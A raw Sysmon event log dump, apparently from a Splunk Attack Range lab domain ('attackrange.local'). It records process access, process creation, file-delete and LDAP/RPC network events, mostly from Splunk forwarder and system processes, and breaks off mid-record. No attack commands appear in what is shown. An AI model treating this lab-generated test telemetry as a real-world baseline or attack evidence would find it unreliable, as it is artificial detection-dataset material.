07:48:51.304{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:51.304{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.304{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F3E3-60EB-0F7D-00000000CF01}10136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.304{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3E3-60EB-0F7D-00000000CF01}10136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.305{466BC892-F3E3-60EB-0F7D-00000000CF01}10136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.222{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E0D02F7B01C021201C015C9E53D43008,SHA256=BFEA0F27BD20FC7392EB5A1CB0CB0A6C6C9CD53A191B3685D2D1E62AA4A8D858,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:52.656{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3E4-60EB-117D-00000000CF01}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:52.640{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:52.640{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:52.640{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:52.640{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:52.640{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F3E4-60EB-117D-00000000CF01}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:52.640{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3E4-60EB-117D-00000000CF01}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:52.641{466BC892-F3E4-60EB-117D-00000000CF01}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:52.525{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C87BF7B391B528DC2E4B193EF80E1C4,SHA256=AEBFE8AA77BAB760A39E9719DCB26A9A2CE079FA00195FFA7B30061307660C11,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806946Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:52.182{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=372E7F42A0A0CD7B178CD154ADE1718A,SHA256=98E73755C0EA787AEF3139D8EB74E36FFA02A6305429873A86365AF7079272E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:52.325{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BB503081A0B7112BD43CBB7793EFF6D8,SHA256=2B2E1889AD9AA1EB0822FF24439988C0260585D7154EF6AB46E953B9C015043A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:52.188{466BC892-F3E3-60EB-107D-00000000CF01}31404796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001047628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:45.272{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50975-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001047627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:45.272{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50975-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001047626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:45.260{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50974-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001047625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:45.260{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50974-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001047624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:45.240{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50973-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001047623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:45.240{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT 
AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50973-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 10341000x80000000000000001047622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:53.571{466BC892-F3E5-60EB-127D-00000000CF01}68801724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:53.539{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62E8866F591403C1864F71DF7D8ACD46,SHA256=0FA9D98C56E0FB21036BCFAD9162670E9ACFD51020BF07C0F75C1015F57682E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806948Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:51.330{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57220-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 
23542300x8000000000000000806947Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:53.197{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F60362FAAFD2EDDF55ED13F1E0DEB7D4,SHA256=926903550AF2BCD2E7862B80A97751B817161B65B27EEF56440CF416900C20A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:53.439{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6429F6FE18BDB3E6E57251B2CC99C3AD,SHA256=D78BB15DE4FB71C0C4FA0DC2009598BC47DCD6801211523F6F6414FF560E7ADF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:53.340{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3E5-60EB-127D-00000000CF01}6880C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:53.340{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:53.340{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:53.340{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:53.340{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:53.324{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F3E5-60EB-127D-00000000CF01}6880C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:53.324{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3E5-60EB-127D-00000000CF01}6880C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 